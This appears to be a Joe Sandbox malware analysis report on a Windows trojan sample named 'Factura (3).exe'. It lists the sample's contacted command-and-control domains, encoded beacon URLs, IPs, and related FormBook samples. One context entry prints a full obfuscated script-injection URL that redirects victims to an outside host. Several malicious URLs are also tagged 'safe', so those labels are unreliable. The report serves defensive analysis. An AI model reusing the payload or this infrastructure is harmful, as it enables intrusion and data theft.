            https://www.google.com0%Avira URL Cloudsafe
            http://www.walletweb367.top/mcz6/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.fastmailusercontent.com/filestorage/css/main.css0%Avira URL Cloudsafe
            http://www.deaybrid.info/mcz6/0%Avira URL Cloudsafe
            https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP20%Avira URL Cloudsafe
            http://www.gledingakademiet.no/mcz6/0%Avira URL Cloudsafe
            http://www.zwervertjes.be/mcz6/0%Avira URL Cloudsafe
            https://www.strato.de0%Avira URL Cloudsafe
            http://www.celebration24.co.uk/mcz6/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		unknown
              carliente.com
              		217.160.0.111
              		truetrue
                		unknown
                lenslaser.com
                		162.241.216.140
                		truetrue
                  		unknown
                  allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai
                  		57.151.38.169
                  		truetrue
                    		unknown
                    www.deaybrid.info
                    		162.0.237.22
                    		truetrue
                      		unknown
                      www.gledingakademiet.no
                      		104.37.39.71
                      		truetrue
                        		unknown
                        www.celebration24.co.uk
                        		103.168.172.37
                        		truetrue
                          		unknown
                          www.zwervertjes.be
                          		199.59.243.225
                          		truetrue
                            		unknown
                            dty377.com
                            		3.33.130.190
                            		truetrue
                              		unknown
                              www.walletweb367.top
                              		91.195.240.123
                              		truetrue
                                		unknown
                                www.cookedatthebottom.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.prizesupermarket.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.alfaspa.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.polhi.lol
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.dty377.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.lenslaser.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.jrksa.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.maerealtysg.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.allinone24.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.carliente.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.deaybrid.info/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carliente.com/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zwervertjes.be/mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFKtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lenslaser.com/mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFKtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.walletweb367.top/mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFKtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.carliente.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dty377.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw==true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.allinone24.shop/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lenslaser.com/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.walletweb367.top/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.deaybrid.info/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zwervertjes.be/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gledingakademiet.no/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.celebration24.co.uk/mcz6/true
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabchkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • URL Reputation: malware
                                                    		unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://upx.sf.netAmcache.hve.17.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.fastmail.help/hc/en-us/articles/1500000280141chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.google.comchkdsk.exe, 00000017.00000002.3768491954.0000000007F10000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766720594.000000000722E000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.zwervertjes.beKAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.fastmailusercontent.com/filestorage/css/main.csschkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2chkdsk.exe, 00000017.00000002.3766720594.00000000060E8000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003968000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.strato.deKAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003C8C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    103.168.172.37
                                                    		www.celebration24.co.ukunknown
                                                    		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                    104.37.39.71
                                                    		www.gledingakademiet.noDenmark
                                                    		51468ONECOMDKtrue
                                                    217.160.0.111
                                                    		carliente.comGermany
                                                    		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                    162.0.237.22
                                                    		www.deaybrid.infoCanada
                                                    		22612NAMECHEAP-NETUStrue
                                                    162.241.216.140
                                                    		lenslaser.comUnited States
                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                    91.195.240.123
                                                    		www.walletweb367.topGermany
                                                    		47846SEDO-ASDEtrue
                                                    3.33.130.190
                                                    		dty377.comUnited States
                                                    		8987AMAZONEXPANSIONGBtrue
                                                    57.151.38.169
                                                    		allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.aiBelgium
                                                    		2686ATGS-MMD-ASUStrue
                                                    199.59.243.225
                                                    		www.zwervertjes.beUnited States
                                                    		395082BODIS-NJUStrue

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1442718
                                                    Start date and time:2024-05-16 17:17:16 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 11m 13s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:28
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Factura (3).exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@17/15@15/9
                                                    EGA Information:
                                                    • Successful, ratio: 80%
                                                    HCA Information:
                                                    • Successful, ratio: 88%
                                                    • Number of executed functions: 87
                                                    • Number of non-executed functions: 320
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: Factura (3).exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:18:10API Interceptor56x Sleep call for process: powershell.exe modified
                                                    11:18:28API Interceptor1x Sleep call for process: WerFault.exe modified
                                                    11:19:09API Interceptor9853848x Sleep call for process: chkdsk.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    103.168.172.37PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.celebration24.co.uk/pq0o/
                                                    104.37.39.71rQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                    • www.gledingakademiet.no/pshj/
                                                    217.160.0.111JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.carliente.com/ntpp/
                                                    STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                    • www.carliente.com/3g97/?iJdtI=UBp4nvRH&-b=pss1I4hPKcXAgTePnemGc7FXasx9qfjLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslIPQEm/bcAIhxallCZA6vttiGmo3Ak8A==
                                                    kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                    • www.carliente.com/ve3w/
                                                    NHhH776.exeGet hashmaliciousFormBookBrowse
                                                    • www.carliente.com/ve3w/
                                                    shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.carliente.com/3g97/
                                                    listXofXP.O.docGet hashmaliciousFormBookBrowse
                                                    • www.andrewcrawford.store/q8io/?O4883=HXFtJZVPfNB0&-ZEHgzPx=9NBY9KXzWN9RAeS5ibqsEdeev5FWFMIFtZ8Uab8Ez6YdQ5xfInqB1smFejio0oqmJamksA==
                                                    162.0.237.22WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.shevgin.top/gzu1/
                                                    JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.falstru.xyz/ntpp/
                                                    Order Items.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.crimsoncascade.xyz/a42m/
                                                    Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.astralavenue.xyz/bp6u/
                                                    RCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.crimsoncascade.xyz/a42m/
                                                    098754345678.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.falstru.xyz/z912/
                                                    MBL Draft-Shipment Documents.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.crimsoncascade.xyz/a42m/
                                                    Transaction advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.astralavenue.xyz/bp6u/
                                                    Credit confirmation.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.crimsoncascade.xyz/a42m/
                                                    ai1qjpaw6l.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.crimsoncascade.xyz/a42m/
                                                    162.241.216.140rQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                    • www.lenslaser.com/pshj/
                                                    kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                    • www.lenslaser.com/ve3w/
                                                    Inv 070324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.lenslaser.com/f8eq/
                                                    NHhH776.exeGet hashmaliciousFormBookBrowse
                                                    • www.lenslaser.com/ve3w/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.gledingakademiet.norQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                    • 104.37.39.71
                                                    allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai4333.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 57.151.38.169
                                                    RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 57.151.38.169
                                                    kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                    • 57.151.38.169
                                                    NHhH776.exeGet hashmaliciousFormBookBrowse
                                                    • 57.151.38.169
                                                    www.deaybrid.infoOrder confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 162.0.237.22
                                                    bg.microsoft.map.fastly.nethttps://url2.mailanyone.net/scanner?m=1s6pIE-0001ll-4b&d=4%7Cmail%2F90%2F1715682000%2F1s6pIE-0001ll-4b%7Cin2m%7C57e1b682%7C17902772%7C12174482%7C66433B46FD7D477758F95ED72A0CFF20&o=%2Fphte%3A%2Fxtswezc.9cp.12%2Fcon1ujmr%2Fs&s=sBgYgmAjxDPYLIi3UWk9augppQoGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://www.canva.com/design/DAGDIK1pPgI/L2u9cBJTl10MeMf9RARY1g/view?utm_content=DAGDIK1pPgI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://achievementfirst.org/?s=%22%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C83%2C98%2C99%2C127%2C104%2C69%2C96%2C117%2C101%2C71%2C104%2C105%2C91%2C69%2C68%2C77%2C127%2C80%2C97%2C101%2C19%2C123%2C117%2C70%2C122%2C68%2C123%2C92%2C80%2C112%2C115%2C99%2C103%2C66%2C19%2C83%2C105%2C103%2C112%2C127%2C94%2C30%2C110%2C25%2C122%2C29%2C24%2C89%2C108%2C96%2C102%2C71%2C93%2C64%2C25%2C72%2C31%2C126%2C31%2C83%2C98%2C120%2C66%2C107%2C93%2C84%2C84%2C5%2C27%2C29%2C5%2C27%2C27%2C27%2C27%2C30%2C31%2C27%2C26%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28Get hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://expodat.comGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    https://bro0.trusthalloween.com/code/mizweojtg45ha3ddf42dsnbxGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    http://trackmenow.lifeGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    https://bro0.trusthalloween.com/code/mizweojtg45ha3ddf42dsnbxGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    https://bafybeif5tiihzpzpshrmm6wcckxacabqz3wsd327oankr4xtedhk5ra5fq.ipfs.storry.tv/#investmentscomms@momentum.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                    • 199.232.214.172
                                                    https://drive.google.com/file/d/1uToOl05w32NfjukowyiNWKRTGJp3X8zq/view?usp=drive_webGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    Solicitud de oferta.xlsx.vbsGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    www.celebration24.co.ukPO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 103.168.172.37
                                                    www.zwervertjes.beOrder confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 199.59.243.225

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ONEANDONE-ASBrauerstrasse48DEWaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 213.171.195.105
                                                    HJTS4RpK4H.elfGet hashmaliciousMiraiBrowse
                                                    • 82.223.92.206
                                                    JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 217.160.0.111
                                                    SHIPMENT ARRIVAL NOTICE.exeGet hashmaliciousFormBookBrowse
                                                    • 213.171.195.105
                                                    INVOICE-#0000898876-PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 212.227.172.253
                                                    file2.jsGet hashmaliciousUnknownBrowse
                                                    • 217.160.0.87
                                                    vm6XYZzWOd.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                    • 74.208.236.63
                                                    RFQ-25251.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 217.76.128.34
                                                    G7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                                                    • 213.171.195.105
                                                    file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 217.160.0.46
                                                    NAMECHEAP-NETUShttp://cytechltd.net/blueridgesupportGet hashmaliciousUnknownBrowse
                                                    • 198.54.126.119
                                                    WaybillDoc_43948767.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 162.0.237.22
                                                    17158441246d37802f97c2611e248b49702f7346b2788831fc8c7e217b8fb1e2cb7dbf2dad677.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 198.54.122.135
                                                    JUSTIFICANTE DE PAGO 18903547820000.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 162.0.237.22
                                                    detalle_transferencia_2024-05-13T064143.173 0200_3049280002017526_PDF.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 198.54.122.135
                                                    SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 199.188.205.52
                                                    Order Items.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 63.250.43.147
                                                    Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 162.0.237.22
                                                    https://www.solarpanelguide.info/dalil/oi/Get hashmaliciousUnknownBrowse
                                                    • 198.54.120.50
                                                    RCoAOiAqk7.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 63.250.43.147
                                                    AARNET-AS-APAustralianAcademicandResearchNetworkAARNeB9N53jcurM.elfGet hashmaliciousGafgytBrowse
                                                    • 103.161.35.44
                                                    a-r.m-5.ISIS.elfGet hashmaliciousGafgytBrowse
                                                    • 103.162.20.51
                                                    r702440_240425170057.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 103.174.153.171
                                                    35nGn066aD.elfGet hashmaliciousGafgytBrowse
                                                    • 103.161.35.44
                                                    x86_huaweiGet hashmaliciousGafgyt, MiraiBrowse
                                                    • 157.85.146.17
                                                    SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 103.179.86.114
                                                    G7DzDN2VcB.exeGet hashmaliciousFormBookBrowse
                                                    • 103.163.138.82
                                                    1ydkC50QfI.elfGet hashmaliciousMiraiBrowse
                                                    • 144.205.148.18
                                                    3bmkUo9WvY.elfGet hashmaliciousMiraiBrowse
                                                    • 103.166.51.171
                                                    TS-240514-UF2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 103.163.138.82
                                                    UNIFIEDLAYER-AS-1UShttps://url2.mailanyone.net/scanner?m=1s7NQF-0009d9-4F&d=4%7Cmail%2F90%2F1715812800%2F1s7NQF-0009d9-4F%7Cin2l%7C57e1b682%7C17902772%7C12174482%7C66453BBFED9CEC27B4A5B1EE4BAEC741&o=lphtm%2F%2Fet%3A.iacooscpsdgm%2Fxinep%2Flmth.&s=S-SHEBwUOIgNBDtbzozNFySq_XUGet hashmaliciousUnknownBrowse
                                                    • 192.185.98.141
                                                    tesla_243.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 192.185.166.221
                                                    https://url2.mailanyone.net/scanner?m=1s6rPP-0008sd-4C&d=4%7Cmail%2F90%2F1715689800%2F1s6rPP-0008sd-4C%7Cin2j%7C57e1b682%7C28613012%7C14303582%7C66435B0BE2CD9AF5D6544C1223A918D6&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105daD%2Fc%2FVUdIrElEDsAARo5yA9IeAgIAxRtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2wh52tghsFuorew%25.cmat2F252s%2552h%252F%2522C22%25tiRepecOdr2nti3%252%25os5BA%25222%257%25lA2%252ul%253n22C%253%252%2521DlAn7%257%25ultiD%26zes%3Ddg1XyrCPui1PH6vX5ow9XSBON05ZyjxwBE%2527%252bBp3GYb%26s%25DxfersestVrce7%3Dio9585nabd7b3d4ab263bb84fd43ee51eb&s=jhUhAkCpAiNjYs9SORDRIQdvPh0Get hashmaliciousHTMLPhisherBrowse
                                                    • 108.167.181.85
                                                    https://docs.google.com/drawings/d/1NvhHuECLQF-PWMkByVuD9aUG5sEbeSN6j9ffcNo0BK4/previewGet hashmaliciousUnknownBrowse
                                                    • 162.240.175.185
                                                    https://gamma.app/docs/Shared-Notice-and-Email-Disclaimers-6aqig6w4unouiqo?mode=present#card-cngszya3osgcwyjGet hashmaliciousHTMLPhisherBrowse
